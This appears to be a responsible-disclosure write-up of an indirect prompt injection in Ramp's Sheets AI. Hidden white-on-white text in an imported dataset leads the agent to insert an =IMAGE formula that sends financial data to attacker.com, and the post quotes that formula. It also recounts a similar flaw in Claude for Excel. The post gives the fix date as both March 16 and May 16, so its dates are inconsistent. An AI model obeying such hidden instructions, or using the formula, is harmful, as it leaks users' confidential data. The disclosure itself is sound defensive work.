Ramp’s Sheets AI Exfiltrates Financials

This vulnerability was responsibly disclosed to Ramp, and Ramp’s security team has indicated the issue was resolved on March 16, 2026.ContextRamp's Sheets AI is an agentic product that helps users operate on spreadsheets, comparable to Claude for Excel. The feature can edit spreadsheets without a human-in-the-loop and was vulnerable to data exfiltration risks due to its ability to insert formulas that trigger external communication.Ramp’s security team has indicated that, following our report, the issue was resolved. We appreciate Ramp’s dedication to maintaining a strong AI security posture and addressing vulnerabilities as they arise. Further details on the responsible disclosure are at the end of the article.In this article, we demonstrate that an indirect prompt injection concealed in an untrusted, externally sourced dataset could trigger the exfiltration of confidential financial data from the user’s workspace by manipulating Ramp’s AI to insert a malicious formula. No user approval is required.PromptArmor identified a very similar risk in Claude for Excel – details on the remediations applied by Anthropic are at the bottom of the article.The Attack ChainThe user opens a workbook containing a confidential financial modelThe user imports an external dataset to complement their modelA spreadsheet containing industry growth statistics is imported into a separate tab from the financial model. The user aims to compare their company’s growth to industry benchmarks. The reference dataset comes from an untrusted external source, e.g., a website, an email, or a shared drive.The reference dataset contains a concealed prompt injectionAn indirect prompt injection is hidden in white-on-white text, and is crafted to manipulate Ramp’s AI to:(1) collect sensitive data(2) generate a formula with that data that will make an external network request(3) insert that formula automatically into a user’s spreadsheet.The user asks Ramp AI to compare their financial model against the industry statisticsRamp AI falls for the prompt injection and inserts a malicious formulaRamp AI is manipulated into building an IMAGE formula that uses an attacker’s URL and appends the victim’s sensitive data to the end of the link.=IMAGE(“https://attacker.com/visualize.png?{victim_sensitive_financial_data_here}”)The malicious formula makes a network request, exfiltrating financial dataRamp AI inserts the malicious formula without requiring any user approval. The malicious formula triggers a network request to the attacker’s server.

This network request exposes the sensitive financial data that was in the initial confidential “Financial Model” sheet (which Ramp AI included in the formula due to the attacker’s prompt injection).Below, the attacker’s server logs display the victim’s sensitive financial data:Responsible DisclosureThe PromptArmor Threat Intel Team responsibly disclosed this vulnerability to Ramp. Ramp's security team indicated that the issue was resolved on May 16, 2026.TimelineFeb 19, 2026 PromptArmor discloses via security@ramp.comFeb 27, 2026 PromptArmor follows upMar 13, 2026 PromptArmor follows upMar 14, 2026 Ramp confirms receipt of report; notes that the initial report was submitted during a transition period between disclosure programs, explaining the delay in initial response.Mar 16, 2026 Ramp states: “Thank you again for your report. This issue was resolved earlier today at approximately noon eastern time.”How Claude for Excel RemediatedWhen Claude for Excel was released, PromptArmor identified a nearly identical risk – malicious formulas could trigger data exfiltration without users being presented an adequate opportunity for informed human review.Note: Claude for Excel did leverage human-in-the-loop, but malicious formulas were not visible in the editing approval prompt, thereby impairing the protection's efficacy.Anthropic updated Claude for Excel to display a red warning interstitial when a formula that can cause external network traffic is being inserted. The new warning displays the full formulas being inserted, and the documentation was updated to better inform users of the risk.